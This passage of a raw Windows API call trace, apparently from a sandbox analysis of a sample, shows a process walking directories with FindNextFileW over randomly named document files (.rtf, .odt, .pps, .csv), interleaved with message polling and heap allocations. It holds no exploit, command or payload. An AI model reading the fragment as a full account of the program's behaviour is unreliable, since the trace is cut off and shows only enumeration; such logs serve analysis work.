nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName=".", cAlternateFileName="")) returned 0x6b8bb8 [0074.108] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47989120, ftCreationTime.dwHighDateTime=0x1d5e7dc, ftLastAccessTime.dwLowDateTime=0xba40d220, ftLastAccessTime.dwHighDateTime=0x1d5e69a, ftLastWriteTime.dwLowDateTime=0xba40d220, ftLastWriteTime.dwHighDateTime=0x1d5e69a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x657690, cFileName="..", cAlternateFileName="")) returned 1 [0074.108] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de90 | out: lpFindFileData=0x61de90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x581b1190, ftCreationTime.dwHighDateTime=0x1d5ddd1, ftLastAccessTime.dwLowDateTime=0xd7475ce0, ftLastAccessTime.dwHighDateTime=0x1d5dae2, ftLastWriteTime.dwLowDateTime=0xd7475ce0, ftLastWriteTime.dwHighDateTime=0x1d5dae2, nFileSizeHigh=0x0, nFileSizeLow=0xa052, dwReserved0=0x4, dwReserved1=0x657690, cFileName="1usRK9.rtf", cAlternateFileName="")) returned 1 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99398460, ftCreationTime.dwHighDateTime=0x1d5e685, ftLastAccessTime.dwLowDateTime=0xa24a8550, ftLastAccessTime.dwHighDateTime=0x1d5dc43, ftLastWriteTime.dwLowDateTime=0xa24a8550, ftLastWriteTime.dwHighDateTime=0x1d5dc43, nFileSizeHigh=0x0, nFileSizeLow=0x108d, dwReserved0=0x10, dwReserved1=0x657690, cFileName="g4FThfJBWB6.odt", cAlternateFileName="G4FTHF~1.ODT")) returned 1 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.108] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.145] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26da4000, ftCreationTime.dwHighDateTime=0x1d5d931, ftLastAccessTime.dwLowDateTime=0x4fe3fc70, ftLastAccessTime.dwHighDateTime=0x1d5e5cf, ftLastWriteTime.dwLowDateTime=0x4fe3fc70, ftLastWriteTime.dwHighDateTime=0x1d5e5cf, nFileSizeHigh=0x0, nFileSizeLow=0x6a9d, dwReserved0=0x10, dwReserved1=0x657690, cFileName="hiVdX.odt", cAlternateFileName="")) returned 1 [0074.145] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.145] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.145] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.145] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.145] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.145] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.145] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x820ae690, ftCreationTime.dwHighDateTime=0x1d5dced, ftLastAccessTime.dwLowDateTime=0xd1f6a5e0, ftLastAccessTime.dwHighDateTime=0x1d5e6b1, ftLastWriteTime.dwLowDateTime=0xd1f6a5e0, ftLastWriteTime.dwHighDateTime=0x1d5e6b1, nFileSizeHigh=0x0, nFileSizeLow=0x5d90, dwReserved0=0x10, dwReserved1=0x657690, cFileName="izNb7DZLOKQSO_3S.pps", cAlternateFileName="IZNB7D~1.PPS")) returned 1 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c77ab30, ftCreationTime.dwHighDateTime=0x1d5dfc3, ftLastAccessTime.dwLowDateTime=0x99fe6ad0, ftLastAccessTime.dwHighDateTime=0x1d5d97b, ftLastWriteTime.dwLowDateTime=0x99fe6ad0, ftLastWriteTime.dwHighDateTime=0x1d5d97b, nFileSizeHigh=0x0, nFileSizeLow=0xa8f4, dwReserved0=0x10, dwReserved1=0x657690, cFileName="T8zO.ots", cAlternateFileName="")) returned 1 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c95c9b0, ftCreationTime.dwHighDateTime=0x1d5e3d7, ftLastAccessTime.dwLowDateTime=0xd9387fe0, ftLastAccessTime.dwHighDateTime=0x1d5e756, ftLastWriteTime.dwLowDateTime=0xd9387fe0, ftLastWriteTime.dwHighDateTime=0x1d5e756, nFileSizeHigh=0x0, nFileSizeLow=0x137f5, dwReserved0=0x10, dwReserved1=0x657690, cFileName="vupb0.pps", cAlternateFileName="")) returned 1 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.146] FindNextFileW (in: hFindFile=0x6b8bb8, lpFindFileData=0x61de78 | out: lpFindFileData=0x61de78*(dwFileAttributes=0x14e0057, ftCreationTime.dwLowDateTime=0xc2d98, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x17, ftLastWriteTime.dwHighDateTime=0x13c0058, nFileSizeHigh=0xc2d98, nFileSizeLow=0x6bbff0, dwReserved0=0x10, dwReserved1=0x657690, cFileName="vu\x08", cAlternateFileName="haဓ\x03\x10")) returned 0 [0074.147] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.147] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.147] FindClose (in: hFindFile=0x6b8bb8 | out: hFindFile=0x6b8bb8) returned 1 [0074.147] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0074.147] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.147] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.147] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0074.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.147] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x658e8210, ftCreationTime.dwHighDateTime=0x1d5e481, ftLastAccessTime.dwLowDateTime=0x5efc4c10, ftLastAccessTime.dwHighDateTime=0x1d5dba4, ftLastWriteTime.dwLowDateTime=0x5efc4c10, ftLastWriteTime.dwHighDateTime=0x1d5dba4, nFileSizeHigh=0x0, nFileSizeLow=0xb478, dwReserved0=0x657494, dwReserved1=0x657690, cFileName="RDv9Bzzuy Is9HIraE.csv", cAlternateFileName="RDV9BZ~1.CSV")) returned 1 [0074.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e58 [0074.147] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.148] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb1b8 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.148] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb1b8 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.148] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690be0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa0) returned 0x6b9a28 [0074.148] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.148] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690be0 [0074.148] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690be0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.148] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.148] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6682b0, ftCreationTime.dwHighDateTime=0x1d5e6a8, ftLastAccessTime.dwLowDateTime=0x8ad0cf40, ftLastAccessTime.dwHighDateTime=0x1d5d902, ftLastWriteTime.dwLowDateTime=0x8ad0cf40, ftLastWriteTime.dwHighDateTime=0x1d5d902, nFileSizeHigh=0x0, nFileSizeLow=0x1084f, dwReserved0=0x650000, dwReserved1=0x657690, cFileName="YNSVRvaq.rtf", cAlternateFileName="")) returned 1 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.149] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb1b8 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690be0 [0074.149] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb1b8 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690be0 [0074.149] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690be0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x6b9a28 [0074.149] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.149] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.149] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.149] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.150] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3772ae0, ftCreationTime.dwHighDateTime=0x1d5e5f4, ftLastAccessTime.dwLowDateTime=0xf1b1dd60, ftLastAccessTime.dwHighDateTime=0x1d5d959, ftLastWriteTime.dwLowDateTime=0xf1b1dd60, ftLastWriteTime.dwHighDateTime=0x1d5d959, nFileSizeHigh=0x0, nFileSizeLow=0x4505, dwReserved0=0x10, dwReserved1=0x657690, cFileName="_--jWXD.odt", cAlternateFileName="")) returned 1 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.150] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb1b8 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.150] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb1b8 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690cc0 [0074.150] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690cc0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690be0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x6b9a28 [0074.150] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.150] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690be0 [0074.150] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690be0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0074.150] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4e0 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.151] FindNextFileW (in: hFindFile=0x6b8af8, lpFindFileData=0x61e0d0 | out: lpFindFileData=0x61e0d0*(dwFileAttributes=0x12c0068, ftCreationTime.dwLowDateTime=0xc2dd7, ftCreationTime.dwHighDateTime=0x63f910, ftLastAccessTime.dwLowDateTime=0x77cb1ecd, ftLastAccessTime.dwHighDateTime=0x1317ae, ftLastWriteTime.dwLowDateTime=0x13, ftLastWriteTime.dwHighDateTime=0x1140069, nFileSizeHigh=0xc2dd7, nFileSizeLow=0x6b9ac8, dwReserved0=0x10, dwReserved1=0x657690, cFileName="_-\x08", cAlternateFileName="?haဓ\x03\x10")) returned 0 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b4b0 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690c00 [0074.151] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6bb1b8 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x690be0 [0074.151] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b498 [0074.151] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x690c00 [0074.151] FindClose (in: hFindFile=0x6b8af8 | out: hFindFile=0x6b8af8) returned 1 [0074.151] FindNextFileW (in: hFindFile=0x6b8a38, lpFindFileData=0x61e328 | out: lpFindFileData=0x61e328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c097e0, ftCreationTime.dwHighDateTime=0x1d5a62a, ftLastAccessTime.dwLowDateTime=0xc1f13840, ftLastAccessTime.dwHighDateTime=0x1d599d6, ftLastWriteTime.dwLowDateTime=0xc1f13840, ftLastWriteTime.dwHighDateTime=0x1d599d6, nFileSizeHigh=0x0, nFileSizeLow=0x1b20, dwReserved0=0x657494, dwReserved1=0x657690, 